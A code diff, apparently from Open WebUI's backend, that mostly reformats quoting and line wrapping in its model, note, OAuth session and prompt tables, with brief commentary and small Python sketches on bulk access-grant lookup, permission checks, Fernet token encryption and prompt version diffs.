Optional[Session] = None ) -> list[ModelUserResponse]: models = self.get_models(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ model for model in models if model.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="model", + resource_type='model', resource_id=model.id, permission=permission, user_group_ids=user_group_ids, db=db, ) ] - def _has_permission(self, db, query, filter: dict, permission: str = "read"): + def _has_permission(self, db, query, filter: dict, permission: str = 'read'): return AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Model, filter=filter, - resource_type="model", + resource_type='model', permission=permission, ) @@ -285,55 +269,55 @@ def search_models( query = query.filter(Model.base_model_id != None) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Model.name.ilike(f"%{query_key}%"), - Model.base_model_id.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), - User.username.ilike(f"%{query_key}%"), + Model.name.ilike(f'%{query_key}%'), + Model.base_model_id.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), + User.username.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Model.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Model.user_id != user_id) # Apply access control filtering query = self._has_permission( db, query, filter, - permission="read", + permission='read', ) - tag = filter.get("tag") + tag = filter.get('tag') if tag: # TODO: This is a simple implementation and should be improved for performance like_pattern = f'%"{tag.lower()}"%' # `"tag"` inside JSON array meta_text = func.lower(cast(Model.meta, String)) query = query.filter(meta_text.like(like_pattern)) - order_by = filter.get("order_by") - direction = 
filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "name": - if direction == "asc": + if order_by == 'name': + if direction == 'asc': query = query.order_by(Model.name.asc()) else: query = query.order_by(Model.name.desc()) - elif order_by == "created_at": - if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(Model.created_at.asc()) else: query = query.order_by(Model.created_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Model.updated_at.asc()) else: query = query.order_by(Model.updated_at.desc()) @@ -352,7 +336,7 @@ def search_models( items = query.all() model_ids = [model.id for model, _ in items] - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) models = [] for model, user in items: @@ -363,36 +347,26 @@ def search_models( access_grants=grants_map.get(model.id, []), db=db, ).model_dump(), - user=( - UserResponse(**UserModel.model_validate(user).model_dump()) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) return ModelListResponse(items=models, total=total) - def get_model_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ModelModel]: + def get_model_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ModelModel]: try: with get_db_context(db) as db: model = db.get(Model, id) return self._to_model_model(model, db=db) if model else None except Exception: return None - def get_models_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> list[ModelModel]: + def get_models_by_ids(self, ids: list[str], db: Optional[Session] = None) -> list[ModelModel]: try: with get_db_context(db) as db: models = db.query(Model).filter(Model.id.in_(ids)).all() model_ids = [model.id for model in models] - grants_map = AccessGrants.get_grants_by_resources( - "model", model_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ self._to_model_model( model, @@ -404,9 +378,7 @@ def get_models_by_ids( except Exception: return [] - def toggle_model_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ModelModel]: + def toggle_model_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ModelModel]: with get_db_context(db) as db: try: model = db.query(Model).filter_by(id=id).first() @@ -422,30 +394,26 @@ def toggle_model_by_id( except Exception: return None - def update_model_by_id( - self, id: str, model: ModelForm, db: Optional[Session] = None - ) -> Optional[ModelModel]: + def update_model_by_id(self, id: str, model: ModelForm, db: Optional[Session] = None) -> Optional[ModelModel]: try: with get_db_context(db) as db: # update only the fields that are present in the model - data = model.model_dump(exclude={"id", "access_grants"}) + data = model.model_dump(exclude={'id', 'access_grants'}) result = db.query(Model).filter_by(id=id).update(data) db.commit() if model.access_grants is not None: - AccessGrants.set_access_grants( - "model", id, model.access_grants, db=db - ) + AccessGrants.set_access_grants('model', id, model.access_grants, db=db) return self.get_model_by_id(id, db=db) except Exception as e: - log.exception(f"Failed to update the model by id {id}: {e}") + log.exception(f'Failed to update the model by id 
{id}: {e}') return None def delete_model_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("model", id, db=db) + AccessGrants.revoke_all_access('model', id, db=db) db.query(Model).filter_by(id=id).delete() db.commit() @@ -458,17 +426,15 @@ def delete_all_models(self, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: model_ids = [row[0] for row in db.query(Model.id).all()] for model_id in model_ids: - AccessGrants.revoke_all_access("model", model_id, db=db) + AccessGrants.revoke_all_access('model', model_id, db=db) db.query(Model).delete() db.commit() return True except Exception: return False - def sync_models( - self, user_id: str, models: list[ModelModel], db: Optional[Session] = None - ) -> list[ModelModel]: + def sync_models(self, user_id: str, models: list[ModelModel], db: Optional[Session] = None) -> list[ModelModel]: try: with get_db_context(db) as db: # Get existing models @@ -483,37 +449,33 @@ def sync_models( if model.id in existing_ids: db.query(Model).filter_by(id=model.id).update( { - **model.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "updated_at": int(time.time()), + **model.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) else: new_model = Model( **{ - **model.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "updated_at": int(time.time()), + **model.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) db.add(new_model) - AccessGrants.set_access_grants( - "model", model.id, model.access_grants, db=db - ) + AccessGrants.set_access_grants('model', model.id, model.access_grants, db=db) # Remove models that are no longer present for model in existing_models: if model.id not in new_model_ids: - AccessGrants.revoke_all_access("model", model.id, db=db) + AccessGrants.revoke_all_access('model', model.id, db=db) db.delete(model) db.commit() all_models = db.query(Model).all() model_ids = [model.id for model in all_models] - grants_map = AccessGrants.get_grants_by_resources( - "model", model_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ self._to_model_model( model, @@ -523,7 +485,7 @@ def sync_models( for model in all_models ] except Exception as e: - log.exception(f"Error syncing models for user {user_id}: {e}") + log.exception(f'Error syncing models for user {user_id}: {e}') return []
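A pattern that recurs throughout this patch is visible in models.py: access grants for a whole result set are fetched with one get_grants_by_resources call and handed out from a map, instead of one lookup per row. A self-contained sketch of the idea, where fetch_grants_bulk is a hypothetical stand-in for the real call and the row data is faked:

from collections import defaultdict

def fetch_grants_bulk(resource_type, resource_ids):
    # The real call would issue a single IN-query; this fakes its result set.
    rows = [('model-a', 'grant-1'), ('model-a', 'grant-2'), ('model-b', 'grant-3')]
    grants_map = defaultdict(list)
    for resource_id, grant in rows:
        if resource_id in resource_ids:
            grants_map[resource_id].append(grant)
    return grants_map

model_ids = ['model-a', 'model-b', 'model-c']
grants_map = fetch_grants_bulk('model', model_ids)
for model_id in model_ids:
    # Missing ids fall back to [], matching grants_map.get(model.id, []) above.
    print(model_id, grants_map.get(model_id, []))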
backend/open_webui/models/notes.py+58 −94 modified@@ -21,7 +21,7 @@ class Note(Base): - __tablename__ = "note" + __tablename__ = 'note' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) @@ -88,62 +88,52 @@ class NoteListResponse(BaseModel): class NoteTable: - def _get_access_grants( - self, note_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("note", note_id, db=db) + def _get_access_grants(self, note_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('note', note_id, db=db) def _to_note_model( self, note: Note, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> NoteModel: - note_data = NoteModel.model_validate(note).model_dump(exclude={"access_grants"}) - note_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(note_data["id"], db=db) + note_data = NoteModel.model_validate(note).model_dump(exclude={'access_grants'}) + note_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(note_data['id'], db=db) ) return NoteModel.model_validate(note_data) - def _has_permission(self, db, query, filter: dict, permission: str = "read"): + def _has_permission(self, db, query, filter: dict, permission: str = 'read'): return AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Note, filter=filter, - resource_type="note", + resource_type='note', permission=permission, ) - def insert_new_note( - self, user_id: str, form_data: NoteForm, db: Optional[Session] = None - ) -> Optional[NoteModel]: + def insert_new_note(self, user_id: str, form_data: NoteForm, db: Optional[Session] = None) -> Optional[NoteModel]: with get_db_context(db) as db: note = NoteModel( **{ - "id": str(uuid.uuid4()), - "user_id": user_id, - **form_data.model_dump(exclude={"access_grants"}), - "created_at": int(time.time_ns()), - "updated_at": int(time.time_ns()), - "access_grants": [], + 'id': str(uuid.uuid4()), + 'user_id': user_id, + **form_data.model_dump(exclude={'access_grants'}), + 'created_at': int(time.time_ns()), + 'updated_at': int(time.time_ns()), + 'access_grants': [], } ) - new_note = Note(**note.model_dump(exclude={"access_grants"})) + new_note = Note(**note.model_dump(exclude={'access_grants'})) db.add(new_note) db.commit() - AccessGrants.set_access_grants( - "note", note.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('note', note.id, form_data.access_grants, db=db) return self._to_note_model(new_note, db=db) - def get_notes( - self, skip: int = 0, limit: int = 50, db: Optional[Session] = None - ) -> list[NoteModel]: + def get_notes(self, skip: int = 0, limit: int = 50, db: Optional[Session] = None) -> list[NoteModel]: with get_db_context(db) as db: query = db.query(Note).order_by(Note.updated_at.desc()) if skip is not None: @@ -152,13 +142,8 @@ def get_notes( query = query.limit(limit) notes = query.all() note_ids = [note.id for note in notes] - grants_map = AccessGrants.get_grants_by_resources("note", note_ids, db=db) - return [ - self._to_note_model( - note, access_grants=grants_map.get(note.id, []), db=db - ) - for note in notes - ] + grants_map = AccessGrants.get_grants_by_resources('note', note_ids, db=db) + return [self._to_note_model(note, access_grants=grants_map.get(note.id, []), db=db) for note in notes] def search_notes( self, @@ -171,36 +156,32 @@ def search_notes( with get_db_context(db) as 
db: query = db.query(Note, User).outerjoin(User, User.id == Note.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: # Normalize search by removing hyphens and spaces (e.g., "todo" matches "to-do" and "to do") - normalized_query = query_key.replace("-", "").replace(" ", "") + normalized_query = query_key.replace('-', '').replace(' ', '') query = query.filter( or_( + func.replace(func.replace(Note.title, '-', ''), ' ', '').ilike(f'%{normalized_query}%'), func.replace( - func.replace(Note.title, "-", ""), " ", "" - ).ilike(f"%{normalized_query}%"), - func.replace( - func.replace( - cast(Note.data["content"]["md"], Text), "-", "" - ), - " ", - "", - ).ilike(f"%{normalized_query}%"), + func.replace(cast(Note.data['content']['md'], Text), '-', ''), + ' ', + '', + ).ilike(f'%{normalized_query}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Note.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Note.user_id != user_id) # Apply access control filtering - if "permission" in filter: - permission = filter["permission"] + if 'permission' in filter: + permission = filter['permission'] else: - permission = "write" + permission = 'write' query = self._has_permission( db, @@ -209,21 +190,21 @@ def search_notes( permission=permission, ) - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "name": - if direction == "asc": + if order_by == 'name': + if direction == 'asc': query = query.order_by(Note.title.asc()) else: query = query.order_by(Note.title.desc()) - elif order_by == "created_at": - if direction == "asc": + elif order_by == 'created_at': + if direction == 'asc': query = query.order_by(Note.created_at.asc()) else: query = query.order_by(Note.created_at.desc()) - elif order_by == "updated_at": - if direction == "asc": + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Note.updated_at.asc()) else: query = query.order_by(Note.updated_at.desc()) @@ -244,7 +225,7 @@ def search_notes( items = query.all() note_ids = [note.id for note, _ in items] - grants_map = AccessGrants.get_grants_by_resources("note", note_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('note', note_ids, db=db) notes = [] for note, user in items: @@ -255,11 +236,7 @@ def search_notes( access_grants=grants_map.get(note.id, []), db=db, ).model_dump(), - user=( - UserResponse(**UserModel.model_validate(user).model_dump()) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) @@ -268,20 +245,16 @@ def search_notes( def get_notes_by_user_id( self, user_id: str, - permission: str = "read", + permission: str = 'read', skip: int = 0, limit: int = 50, db: Optional[Session] = None, ) -> list[NoteModel]: with get_db_context(db) as db: - user_group_ids = [ - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - ] + user_group_ids = [group.id for group in Groups.get_groups_by_member_id(user_id, db=db)] query = db.query(Note).order_by(Note.updated_at.desc()) - query = self._has_permission( - db, query, {"user_id": user_id, "group_ids": user_group_ids}, permission - ) + query = self._has_permission(db, query, {'user_id': user_id, 'group_ids': user_group_ids}, permission) if skip is not 
None: query = query.offset(skip) @@ -290,17 +263,10 @@ def get_notes_by_user_id( notes = query.all() note_ids = [note.id for note in notes] - grants_map = AccessGrants.get_grants_by_resources("note", note_ids, db=db) - return [ - self._to_note_model( - note, access_grants=grants_map.get(note.id, []), db=db - ) - for note in notes - ] + grants_map = AccessGrants.get_grants_by_resources('note', note_ids, db=db) + return [self._to_note_model(note, access_grants=grants_map.get(note.id, []), db=db) for note in notes] - def get_note_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[NoteModel]: + def get_note_by_id(self, id: str, db: Optional[Session] = None) -> Optional[NoteModel]: with get_db_context(db) as db: note = db.query(Note).filter(Note.id == id).first() return self._to_note_model(note, db=db) if note else None @@ -315,17 +281,15 @@ def update_note_by_id( form_data = form_data.model_dump(exclude_unset=True) - if "title" in form_data: - note.title = form_data["title"] - if "data" in form_data: - note.data = {**note.data, **form_data["data"]} - if "meta" in form_data: - note.meta = {**note.meta, **form_data["meta"]} + if 'title' in form_data: + note.title = form_data['title'] + if 'data' in form_data: + note.data = {**note.data, **form_data['data']} + if 'meta' in form_data: + note.meta = {**note.meta, **form_data['meta']} - if "access_grants" in form_data: - AccessGrants.set_access_grants( - "note", id, form_data["access_grants"], db=db - ) + if 'access_grants' in form_data: + AccessGrants.set_access_grants('note', id, form_data['access_grants'], db=db) note.updated_at = int(time.time_ns()) @@ -335,7 +299,7 @@ def update_note_by_id( def delete_note_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("note", id, db=db) + AccessGrants.revoke_all_access('note', id, db=db) db.query(Note).filter(Note.id == id).delete() db.commit() return True
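notes.py now routes note reads through the same AccessGrants plumbing used by the other resource types in this patch. The FastAPI routers that consume it are not part of this excerpt, but a self-contained sketch of the read-side check that plumbing enables looks roughly like this; has_read_access is a hypothetical stand-in for AccessGrants.has_access, and the data is faked:

from dataclasses import dataclass

@dataclass
class Note:
    id: str
    user_id: str
    title: str

GRANTS = {('note', 'n1'): {'u2'}}  # (resource_type, resource_id) -> reader ids

def has_read_access(user_id, resource_type, resource_id):
    return user_id in GRANTS.get((resource_type, resource_id), set())

def get_note_for_user(note, user_id):
    # Deny unless the caller owns the note or holds an explicit grant;
    # knowing a valid note id is not enough on its own.
    if note.user_id == user_id or has_read_access(user_id, 'note', note.id):
        return note
    raise PermissionError('not authorized to read this note')

note = Note(id='n1', user_id='u1', title='private')
print(get_note_for_user(note, 'u2').title)  # granted reader -> 'private'
try:
    get_note_for_user(note, 'u3')
except PermissionError as e:
    print('u3:', e)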
backend/open_webui/models/oauth_sessions.py+35 −51 modified@@ -23,23 +23,21 @@ class OAuthSession(Base): - __tablename__ = "oauth_session" + __tablename__ = 'oauth_session' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text, nullable=False) provider = Column(Text, nullable=False) - token = Column( - Text, nullable=False - ) # JSON with access_token, id_token, refresh_token + token = Column(Text, nullable=False) # JSON with access_token, id_token, refresh_token expires_at = Column(BigInteger, nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) # Add indexes for better performance __table_args__ = ( - Index("idx_oauth_session_user_id", "user_id"), - Index("idx_oauth_session_expires_at", "expires_at"), - Index("idx_oauth_session_user_provider", "user_id", "provider"), + Index('idx_oauth_session_user_id', 'user_id'), + Index('idx_oauth_session_expires_at', 'expires_at'), + Index('idx_oauth_session_user_provider', 'user_id', 'provider'), ) @@ -71,7 +69,7 @@ class OAuthSessionTable: def __init__(self): self.encryption_key = OAUTH_SESSION_TOKEN_ENCRYPTION_KEY if not self.encryption_key: - raise Exception("OAUTH_SESSION_TOKEN_ENCRYPTION_KEY is not set") + raise Exception('OAUTH_SESSION_TOKEN_ENCRYPTION_KEY is not set') # check if encryption key is in the right format for Fernet (32 url-safe base64-encoded bytes) if len(self.encryption_key) != 44: @@ -83,7 +81,7 @@ def __init__(self): try: self.fernet = Fernet(self.encryption_key) except Exception as e: - log.error(f"Error initializing Fernet with provided key: {e}") + log.error(f'Error initializing Fernet with provided key: {e}') raise def _encrypt_token(self, token) -> str: @@ -93,7 +91,7 @@ def _encrypt_token(self, token) -> str: encrypted = self.fernet.encrypt(token_json.encode()).decode() return encrypted except Exception as e: - log.error(f"Error encrypting tokens: {e}") + log.error(f'Error encrypting tokens: {e}') raise def _decrypt_token(self, token: str): @@ -102,7 +100,7 @@ def _decrypt_token(self, token: str): decrypted = self.fernet.decrypt(token.encode()).decode() return json.loads(decrypted) except Exception as e: - log.error(f"Error decrypting tokens: {type(e).__name__}: {e}") + log.error(f'Error decrypting tokens: {type(e).__name__}: {e}') raise def create_session( @@ -120,13 +118,13 @@ def create_session( result = OAuthSession( **{ - "id": id, - "user_id": user_id, - "provider": provider, - "token": self._encrypt_token(token), - "expires_at": token.get("expires_at"), - "created_at": current_time, - "updated_at": current_time, + 'id': id, + 'user_id': user_id, + 'provider': provider, + 'token': self._encrypt_token(token), + 'expires_at': token.get('expires_at'), + 'created_at': current_time, + 'updated_at': current_time, } ) @@ -141,12 +139,10 @@ def create_session( else: return None except Exception as e: - log.error(f"Error creating OAuth session: {e}") + log.error(f'Error creating OAuth session: {e}') return None - def get_session_by_id( - self, session_id: str, db: Optional[Session] = None - ) -> Optional[OAuthSessionModel]: + def get_session_by_id(self, session_id: str, db: Optional[Session] = None) -> Optional[OAuthSessionModel]: """Get OAuth session by ID""" try: with get_db_context(db) as db: @@ -158,7 +154,7 @@ def get_session_by_id( return None except Exception as e: - log.error(f"Error getting OAuth session by ID: {e}") + log.error(f'Error getting OAuth session by ID: {e}') return None def get_session_by_id_and_user_id( @@ -167,19 +163,15 @@ 
def get_session_by_id_and_user_id( """Get OAuth session by ID and user ID""" try: with get_db_context(db) as db: - session = ( - db.query(OAuthSession) - .filter_by(id=session_id, user_id=user_id) - .first() - ) + session = db.query(OAuthSession).filter_by(id=session_id, user_id=user_id).first() if session: db.expunge(session) session.token = self._decrypt_token(session.token) return OAuthSessionModel.model_validate(session) return None except Exception as e: - log.error(f"Error getting OAuth session by ID: {e}") + log.error(f'Error getting OAuth session by ID: {e}') return None def get_session_by_provider_and_user_id( @@ -201,12 +193,10 @@ def get_session_by_provider_and_user_id( return None except Exception as e: - log.error(f"Error getting OAuth session by provider and user ID: {e}") + log.error(f'Error getting OAuth session by provider and user ID: {e}') return None - def get_sessions_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> List[OAuthSessionModel]: + def get_sessions_by_user_id(self, user_id: str, db: Optional[Session] = None) -> List[OAuthSessionModel]: """Get all OAuth sessions for a user""" try: with get_db_context(db) as db: @@ -220,15 +210,15 @@ def get_sessions_by_user_id( results.append(OAuthSessionModel.model_validate(session)) except Exception as e: log.warning( - f"Skipping OAuth session {session.id} due to decryption failure, deleting corrupted session: {type(e).__name__}: {e}" + f'Skipping OAuth session {session.id} due to decryption failure, deleting corrupted session: {type(e).__name__}: {e}' ) db.query(OAuthSession).filter_by(id=session.id).delete() db.commit() return results except Exception as e: - log.error(f"Error getting OAuth sessions by user ID: {e}") + log.error(f'Error getting OAuth sessions by user ID: {e}') return [] def update_session_by_id( @@ -241,9 +231,9 @@ def update_session_by_id( db.query(OAuthSession).filter_by(id=session_id).update( { - "token": self._encrypt_token(token), - "expires_at": token.get("expires_at"), - "updated_at": current_time, + 'token': self._encrypt_token(token), + 'expires_at': token.get('expires_at'), + 'updated_at': current_time, } ) db.commit() @@ -256,46 +246,40 @@ def update_session_by_id( return None except Exception as e: - log.error(f"Error updating OAuth session tokens: {e}") + log.error(f'Error updating OAuth session tokens: {e}') return None - def delete_session_by_id( - self, session_id: str, db: Optional[Session] = None - ) -> bool: + def delete_session_by_id(self, session_id: str, db: Optional[Session] = None) -> bool: """Delete an OAuth session""" try: with get_db_context(db) as db: result = db.query(OAuthSession).filter_by(id=session_id).delete() db.commit() return result > 0 except Exception as e: - log.error(f"Error deleting OAuth session: {e}") + log.error(f'Error deleting OAuth session: {e}') return False - def delete_sessions_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_sessions_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: """Delete all OAuth sessions for a user""" try: with get_db_context(db) as db: result = db.query(OAuthSession).filter_by(user_id=user_id).delete() db.commit() return True except Exception as e: - log.error(f"Error deleting OAuth sessions by user ID: {e}") + log.error(f'Error deleting OAuth sessions by user ID: {e}') return False - def delete_sessions_by_provider( - self, provider: str, db: Optional[Session] = None - ) -> bool: + def delete_sessions_by_provider(self, provider: str, db: 
Optional[Session] = None) -> bool: """Delete all OAuth sessions for a provider""" try: with get_db_context(db) as db: db.query(OAuthSession).filter_by(provider=provider).delete() db.commit() return True except Exception as e: - log.error(f"Error deleting OAuth sessions by provider {provider}: {e}") + log.error(f'Error deleting OAuth sessions by provider {provider}: {e}') return False
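OAuth tokens are stored Fernet-encrypted, and the constructor above checks for a 44-character key because a Fernet key is 32 random bytes in url-safe base64 (44 characters once encoded). A round-trip sketch using the cryptography package; the token values are illustrative:

import json
from cryptography.fernet import Fernet

key = Fernet.generate_key()  # 32 random bytes, url-safe base64-encoded
assert len(key) == 44

fernet = Fernet(key)
token = {'access_token': 'abc', 'refresh_token': 'def', 'expires_at': 1767225600}

ciphertext = fernet.encrypt(json.dumps(token).encode()).decode()
restored = json.loads(fernet.decrypt(ciphertext.encode()).decode())
assert restored == token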
backend/open_webui/models/prompt_history.py+17 −31 modified@@ -19,7 +19,7 @@ class PromptHistory(Base): - __tablename__ = "prompt_history" + __tablename__ = 'prompt_history' id = Column(Text, primary_key=True) prompt_id = Column(Text, nullable=False, index=True) @@ -100,11 +100,7 @@ def get_history_by_prompt_id( return [ PromptHistoryResponse( **PromptHistoryModel.model_validate(entry).model_dump(), - user=( - users_dict.get(entry.user_id).model_dump() - if users_dict.get(entry.user_id) - else None - ), + user=(users_dict.get(entry.user_id).model_dump() if users_dict.get(entry.user_id) else None), ) for entry in entries ] @@ -116,9 +112,7 @@ def get_history_entry_by_id( ) -> Optional[PromptHistoryModel]: """Get a specific history entry by ID.""" with get_db_context(db) as db: - entry = ( - db.query(PromptHistory).filter(PromptHistory.id == history_id).first() - ) + entry = db.query(PromptHistory).filter(PromptHistory.id == history_id).first() if entry: return PromptHistoryModel.model_validate(entry) return None @@ -147,11 +141,7 @@ def get_history_count( ) -> int: """Get the number of history entries for a prompt.""" with get_db_context(db) as db: - return ( - db.query(PromptHistory) - .filter(PromptHistory.prompt_id == prompt_id) - .count() - ) + return db.query(PromptHistory).filter(PromptHistory.prompt_id == prompt_id).count() def compute_diff( self, @@ -161,9 +151,7 @@ def compute_diff( ) -> Optional[dict]: """Compute diff between two history entries.""" with get_db_context(db) as db: - from_entry = ( - db.query(PromptHistory).filter(PromptHistory.id == from_id).first() - ) + from_entry = db.query(PromptHistory).filter(PromptHistory.id == from_id).first() to_entry = db.query(PromptHistory).filter(PromptHistory.id == to_id).first() if not from_entry or not to_entry: @@ -173,26 +161,26 @@ def compute_diff( to_snapshot = to_entry.snapshot # Compute diff for content field - from_content = from_snapshot.get("content", "") - to_content = to_snapshot.get("content", "") + from_content = from_snapshot.get('content', '') + to_content = to_snapshot.get('content', '') diff_lines = list( difflib.unified_diff( from_content.splitlines(keepends=True), to_content.splitlines(keepends=True), - fromfile=f"v{from_id[:8]}", - tofile=f"v{to_id[:8]}", - lineterm="", + fromfile=f'v{from_id[:8]}', + tofile=f'v{to_id[:8]}', + lineterm='', ) ) return { - "from_id": from_id, - "to_id": to_id, - "from_snapshot": from_snapshot, - "to_snapshot": to_snapshot, - "content_diff": diff_lines, - "name_changed": from_snapshot.get("name") != to_snapshot.get("name"), + 'from_id': from_id, + 'to_id': to_id, + 'from_snapshot': from_snapshot, + 'to_snapshot': to_snapshot, + 'content_diff': diff_lines, + 'name_changed': from_snapshot.get('name') != to_snapshot.get('name'), } def delete_history_by_prompt_id( @@ -202,9 +190,7 @@ def delete_history_by_prompt_id( ) -> bool: """Delete all history entries for a prompt.""" with get_db_context(db) as db: - db.query(PromptHistory).filter( - PromptHistory.prompt_id == prompt_id - ).delete() + db.query(PromptHistory).filter(PromptHistory.prompt_id == prompt_id).delete() db.commit() return True
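compute_diff above builds its content_diff with difflib.unified_diff from the standard library. A standalone sketch with two literal snapshots in place of database rows; unlike the patch, which keeps line endings (keepends=True), this drops them so the result prints cleanly:

import difflib

from_content = 'You are a helpful assistant.\nAnswer briefly.\n'
to_content = 'You are a helpful assistant.\nAnswer in detail.\n'

diff_lines = list(
    difflib.unified_diff(
        from_content.splitlines(),
        to_content.splitlines(),
        fromfile='v11111111',  # the patch uses the first 8 chars of the entry id
        tofile='v22222222',
        lineterm='',
    )
)
print('\n'.join(diff_lines))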
backend/open_webui/models/prompts.py+73 −121 modified@@ -19,7 +19,7 @@ class Prompt(Base): - __tablename__ = "prompt" + __tablename__ = 'prompt' id = Column(Text, primary_key=True) command = Column(String, unique=True, index=True) @@ -77,7 +77,6 @@ class PromptAccessListResponse(BaseModel): class PromptForm(BaseModel): - command: str name: str # Changed from title content: str @@ -91,24 +90,18 @@ class PromptForm(BaseModel): class PromptsTable: - def _get_access_grants( - self, prompt_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("prompt", prompt_id, db=db) + def _get_access_grants(self, prompt_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('prompt', prompt_id, db=db) def _to_prompt_model( self, prompt: Prompt, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> PromptModel: - prompt_data = PromptModel.model_validate(prompt).model_dump( - exclude={"access_grants"} - ) - prompt_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(prompt_data["id"], db=db) + prompt_data = PromptModel.model_validate(prompt).model_dump(exclude={'access_grants'}) + prompt_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(prompt_data['id'], db=db) ) return PromptModel.model_validate(prompt_data) @@ -135,34 +128,30 @@ def insert_new_prompt( try: with get_db_context(db) as db: - result = Prompt(**prompt.model_dump(exclude={"access_grants"})) + result = Prompt(**prompt.model_dump(exclude={'access_grants'})) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "prompt", prompt_id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('prompt', prompt_id, form_data.access_grants, db=db) if result: current_access_grants = self._get_access_grants(prompt_id, db=db) snapshot = { - "name": form_data.name, - "content": form_data.content, - "command": form_data.command, - "data": form_data.data or {}, - "meta": form_data.meta or {}, - "tags": form_data.tags or [], - "access_grants": [ - grant.model_dump() for grant in current_access_grants - ], + 'name': form_data.name, + 'content': form_data.content, + 'command': form_data.command, + 'data': form_data.data or {}, + 'meta': form_data.meta or {}, + 'tags': form_data.tags or [], + 'access_grants': [grant.model_dump() for grant in current_access_grants], } history_entry = PromptHistories.create_history_entry( prompt_id=prompt_id, snapshot=snapshot, user_id=user_id, parent_id=None, # Initial commit has no parent - commit_message=form_data.commit_message or "Initial version", + commit_message=form_data.commit_message or 'Initial version', db=db, ) @@ -178,9 +167,7 @@ def insert_new_prompt( except Exception: return None - def get_prompt_by_id( - self, prompt_id: str, db: Optional[Session] = None - ) -> Optional[PromptModel]: + def get_prompt_by_id(self, prompt_id: str, db: Optional[Session] = None) -> Optional[PromptModel]: """Get prompt by UUID.""" try: with get_db_context(db) as db: @@ -191,9 +178,7 @@ def get_prompt_by_id( except Exception: return None - def get_prompt_by_command( - self, command: str, db: Optional[Session] = None - ) -> Optional[PromptModel]: + def get_prompt_by_command(self, command: str, db: Optional[Session] = None) -> Optional[PromptModel]: try: with get_db_context(db) as db: prompt = db.query(Prompt).filter_by(command=command).first() @@ -205,21 
